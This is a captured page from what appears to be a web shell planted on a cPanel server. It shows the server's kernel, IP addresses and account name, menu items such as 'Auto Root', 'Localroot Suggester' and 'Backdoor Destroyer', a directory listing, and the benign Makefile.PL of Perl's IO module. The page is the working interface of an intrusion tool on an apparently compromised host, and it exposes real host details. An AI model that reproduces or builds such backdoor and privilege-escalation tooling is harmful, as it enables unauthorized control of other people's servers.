Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
dist /
IO /
Delete
Unzip
Name
Size
Permission
Date
Action
blib
[ DIR ]
drwxr-xr-x
2016-10-10 17:39
hints
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
lib
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
t
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
ChangeLog
10.44
KB
-r--r--r--
2014-12-27 11:48
IO.bs
0
B
-rw-r--r--
2016-10-10 17:41
IO.c
24.72
KB
-rw-r--r--
2016-10-10 17:39
IO.o
22.16
KB
-rw-r--r--
2016-10-10 17:39
IO.pm
1.36
KB
-r--r--r--
2014-12-27 11:49
IO.xs
13.95
KB
-r--r--r--
2014-12-27 11:49
Makefile
30.63
KB
-rw-r--r--
2016-10-10 17:39
Makefile.PL
1.14
KB
-r--r--r--
2014-12-27 11:48
README
825
B
-r--r--r--
2014-12-27 11:48
pm_to_blib
0
B
-rw-r--r--
2016-10-10 17:39
poll.c
2.97
KB
-r--r--r--
2014-12-27 11:49
poll.h
1.04
KB
-r--r--r--
2014-12-27 11:48
poll.o
936
B
-rw-r--r--
2016-10-10 17:39
Save
Rename
# This -*- perl -*- script makes the Makefile BEGIN { require 5.006_001 } use ExtUtils::MakeMaker; use Config qw(%Config); my $PERL_CORE = grep { $_ eq 'PERL_CORE=1' } @ARGV; #--- Attempt to find <poll.h> my $define = ""; unless ($PERL_CORE or exists $Config{'i_poll'}) { my @inc = split(/\s+/, join(" ", $Config{'usrinc'}, $Config{'incpth'}, $Config{'locincpth'})); foreach $path (@inc) { if (-f $path . "/poll.h") { $define .= "-DI_POLL "; last; } } } if ($] < 5.008 and !$PERL_CORE) { open(FH,">typemap"); print FH "const char * T_PV\n"; close(FH); } #--- Write the Makefile WriteMakefile( VERSION_FROM => "IO.pm", NAME => "IO", OBJECT => '$(O_FILES)', ABSTRACT => 'Perl core IO modules', AUTHOR => 'Graham Barr <gbarr@cpan.org>', PREREQ_PM => { 'Test::More' => 0, }, ( $PERL_CORE ? () : ( INSTALLDIRS => ($] < 5.011 ? 'perl' : 'site'), clean => {FILES => 'typemap'}, ) ), ($define ? (DEFINE => $define) : ()), ((ExtUtils::MakeMaker->VERSION() gt '6.30') ? ('LICENSE' => 'perl') : ()), );